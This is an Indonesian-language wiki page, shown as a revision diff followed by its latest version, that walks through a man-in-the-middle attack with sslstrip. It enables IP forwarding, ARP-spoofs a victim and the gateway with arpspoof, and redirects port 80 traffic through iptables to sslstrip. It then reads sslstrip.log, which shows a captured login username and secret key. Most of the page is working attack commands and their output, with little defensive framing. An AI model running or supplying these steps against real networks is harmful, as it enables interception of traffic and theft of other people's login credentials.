Difference between revisions of "MITM: sslstrip"

From OnnoWiki
Jump to navigation Jump to search
 
(13 intermediate revisions by the same user not shown)
Line 8: Line 8:
 
  route -n
 
  route -n
 
  netstat -nr
 
  netstat -nr
 +
 +
==aktifkan ip forwarding==
  
 
enable forward paket,
 
enable forward paket,
  
  echo “1” > /proc/sys/net/ipv4/ip_forward
+
  echo 1 > /proc/sys/net/ipv4/ip_forward
 +
sysctl -w net.ipv4.ip_forward=1
 +
 
 +
==arp spoofing==
 
   
 
   
 
lakukan arpspoof,
 
lakukan arpspoof,
Line 42: Line 47:
 
Perhatikan MAC address 192.168.0.100 berubah :) ..
 
Perhatikan MAC address 192.168.0.100 berubah :) ..
  
 +
==redirect packet==
 +
 +
redirect inbound traffic ke port 80 (http), menuju port 8080 (sslstrip).
 +
 +
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
 +
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
 +
 +
 +
Untuk redirect HTTPS (port 443) kayanya masih bermasalah baik untuk sslstrip maupun mitmproxy
 +
 +
==sslstrip==
 +
 +
Jalankan sslstrip agar listen pada port 8080
 +
 +
cd ~
 +
sslstrip -l 8080 (untuk kali linux)
 +
python sslstrip.pl –l 8080 (untuk backtrack)
 +
 +
==lihat log==
 +
 +
hasil penyadapan bisa dilihat di sslstrip.log, misalnya,
 +
 +
cd ~
 +
tail sslstrip.log
 +
more sslstrip.log
  
redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip).
+
2017-04-04 17:07:16,065 POST Data (192.168.0.100):
 +
login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1
  
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 1000
 
  
Jalankan sslstrip agar listen pada port 1000
+
==Crashing==
  
sslstrip -l 1000
+
Entah kenapa sslstrip ini suka crash :( ...
python sslstrip.pl –l 1000
 
  
 +
Solusinya, coba tambahkan > /dev/null
  
 +
sslstrip -k -f -l 10000 2> /dev/null
  
  

Latest revision as of 09:23, 3 October 2018

Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/


Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.

Cek routing,

route -n
netstat -nr

aktifkan ip forwarding

enable forward paket,

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1

arp spoofing

lakukan arpspoof,

arpspoof -i eth0 -t victimip routerip
arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
192.168.0.106 = ip victim
192.168.0.100 = ip router / gateway / server yang akan di monitor

Cek apakah berhasil, arp -n di 192.168.0.106

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   66:31:65:39:62:38   C                     enp3s0

Setelah arpspoof di jalankan, lakukan arp -n

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.146            ether   08:00:27:45:7a:dc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   08:00:27:45:7a:dc   C                     enp3s0

Perhatikan MAC address 192.168.0.100 berubah :) ..

redirect packet

redirect inbound traffic ke port 80 (http), menuju port 8080 (sslstrip).

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


Untuk redirect HTTPS (port 443) kayanya masih bermasalah baik untuk sslstrip maupun mitmproxy

sslstrip

Jalankan sslstrip agar listen pada port 8080

cd ~
sslstrip -l 8080 (untuk kali linux)
python sslstrip.pl –l 8080 (untuk backtrack)

lihat log

hasil penyadapan bisa dilihat di sslstrip.log, misalnya,

cd ~
tail sslstrip.log
more sslstrip.log 
2017-04-04 17:07:16,065 POST Data (192.168.0.100):
login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1


Crashing

Entah kenapa sslstrip ini suka crash :( ...

Solusinya, coba tambahkan > /dev/null

sslstrip -k -f -l 10000 2> /dev/null


Referensi